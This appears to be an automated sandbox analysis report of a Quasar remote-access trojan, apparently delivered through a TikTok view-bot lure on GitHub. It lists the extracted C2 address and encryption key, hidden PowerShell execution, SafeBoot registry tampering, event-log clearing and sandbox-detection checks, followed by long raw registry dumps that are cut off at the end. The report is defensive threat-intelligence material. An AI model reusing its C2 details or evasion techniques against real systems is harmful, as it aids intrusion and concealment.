Analysis
max time kernel: 150s
max time network: 148s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19/08/2024, 10:39
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://github.com/topics/tiktok-bot-views
Resource: win10v2004-20240802-en

General
Target: https://github.com/topics/tiktok-bot-views
Malware Config
Extracted
Family: quasar
Version: 1.0.0.0
Botnet: v3.0.5 | Jon
C2: 54.39.249.57:4782
Mutex: 822aa29d-571b-4709-99b4-8f3b2e9865c2
Attributes:
encryption_key: 530365ADCE57276D2B3E3E914F6A39E2A2632C4B
install_name: .exe
log_directory: $sxr-Logs
reconnect_delay: 3000
Signatures

Quasar payload (1 IoCs)
resource | yara_rule
behavioral1/memory/5872-555-0x000002937EA20000-0x000002937F180000-memory.dmp | family_quasar
Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Runs PowerShell and hides the display window.
pid | Process
6032 | powershell.exe
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation | $sxr-mshta.exe
Executes dropped EXE (5 IoCs)
pid | Process
3472 | $sxr-mshta.exe
5796 | $sxr-cmd.exe
5872 | $sxr-powershell.exe
5772 | $sxr-cmd.exe
5764 | $sxr-powershell.exe
Impair Defenses: Safe Mode Boot (1 TTPs, 64 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RTL8023x64 | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\sppsvc | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\srvnet | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UcmCx0101\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Wcmsvc | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DevQueryBroker\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iaLPSS2i_I2C_BXT_P\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PerfNet\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\USBXHCI | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vmicvmsession | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WpnUserService_28d13 | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AxInstSV\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DeviceAssociationBrokerSvc | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\exfat | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\LSI_SAS2i\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\rdyboost\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SgrmBroker\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinMad\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DeviceAssociationBrokerSvc_28d13\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DsmSvc | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ibbus | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Netlogon | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\npsvctrig\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\amdsbs\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RasAgileVpn | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SCardSvr\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TokenBroker | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Acx01000\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\hidserv\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iaStorAV | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Ntfs\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\wcncsvc\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\p2pimsvc | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SEMgrSvc | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\usbcir\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\BattC | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CDPUserSvc_28d13\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmwappushservice | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\FrameServer\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NetbiosSmb | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vhf | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DoSvc\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MozillaMaintenance | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Serenum\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\TCPIPTUNNEL | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RasAuto | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ServiceModelService 3.0.0.0 | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Tcpip6 | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\.NETFramework\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\cnghwassist | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NcaSvc\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NetBIOS\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PrintWorkflowUserSvc_28d13\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vmicshutdown | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WpdUpFltr | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iaLPSS2i_I2C\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iaLPSSi_GPIO\ = "Service" | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\megasr\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\nsi | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UdkUserSvc\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\NetTcpPortSharing | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Ramdisk | powershell.exe
Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RasPppoe\ = "Service" | powershell.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c | powershell.exe
Indicator Removal: Clear Windows Event Logs (1 TTPs, 2 IoCs)
Clears Windows event logs to hide the activity of an intrusion.
description | ioc | Process
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
Hide Artifacts: Hidden Window (1 TTPs, 3 IoCs)
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid | Process
5872 | $sxr-powershell.exe
5772 | $sxr-cmd.exe
5764 | $sxr-powershell.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 1 IoCs)
flow | ioc
60 | camo.githubusercontent.com
Drops file in System32 directory (4 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
Drops file in Windows directory (6 IoCs)
description | ioc | Process
File created | C:\Windows\$sxr-powershell.exe | powershell.exe
File opened for modification | C:\Windows\$sxr-powershell.exe | powershell.exe
File created | C:\Windows\$sxr-mshta.exe | powershell.exe
File opened for modification | C:\Windows\$sxr-mshta.exe | powershell.exe
File created | C:\Windows\$sxr-cmd.exe | powershell.exe
File opened for modification | C:\Windows\$sxr-cmd.exe | powershell.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Checks processor information in registry (2 TTPs, 7 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wermgr.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | mousocoreworker.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | wermgr.exe
Enumerates system info in registry (2 TTPs, 7 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | wermgr.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | wermgr.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | mousocoreworker.exe
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE -
Modifies data under HKEY_USERS (14 IoCs)
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1724064083" | OfficeClickToRun.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 19 Aug 2024 10:41:23 GMT" | OfficeClickToRun.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={E0A7E1DA-20C2-4F1E-A55C-26C54D900007}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | OfficeClickToRun.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | OfficeClickToRun.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\cd489dd0f71355abe30a4375800d6e9c6fb31a781e9d8416ca093e1af6e26975" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 = "0" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a466ec27-0fbd-420b = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\af97b9ceb8c3cae6ad78ceebdb52cb65dd48bbdc142e23ac2efa4e4b783a0b28" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7c27c3af-1ce4-4f9e = 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 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa6ace0c-38ee-4b61 = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\af97b9ceb8c3cae6ad78ceebdb52cb65dd48bbdc142e23ac2efa4e4b783a0b28" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369" Explorer.EXE Key created 
\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\MRUListEx = ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000070000001800000030f125b7ef471a10a5f102608c9eebac0a000000f000000030f125b7ef471a10a5f102608c9eebac04000000a0000000e0cc8de8b3b7d111a9f000aa0060fa310600000080000000e0cc8de8b3b7d111a9f000aa0060fa31020000005000000030f125b7ef471a10a5f102608c9eebac0c00000080000000e0cc8de8b3b7d111a9f000aa0060fa31040000005000000030f125b7ef471a10a5f102608c9eebac0e000000a0000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40f7a7ee-19a2-432e = "8324" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\NodeSlot = "3" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\9b891cd41a286d35a37cb47ab9ead77ad4cc7a1807a9bdb7ac9b64066206cb05" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\897909ef-7fa5-4e6a RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local 
Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\40f7a7ee-19a2-432e RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Key deleted \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\adc341ff-323c-4006 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f72013e8-404a-4286 = 2f29da5124f2da01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f39d3a4e-271a-4035 = 2387105224f2da01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4626bd97-c3db-44eb = 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 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local 
Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f72013e8-404a-4286 = "\\\\?\\Volume{8484AAC9-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\cd489dd0f71355abe30a4375800d6e9c6fb31a781e9d8416ca093e1af6e26975" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f72013e8-404a-4286 = 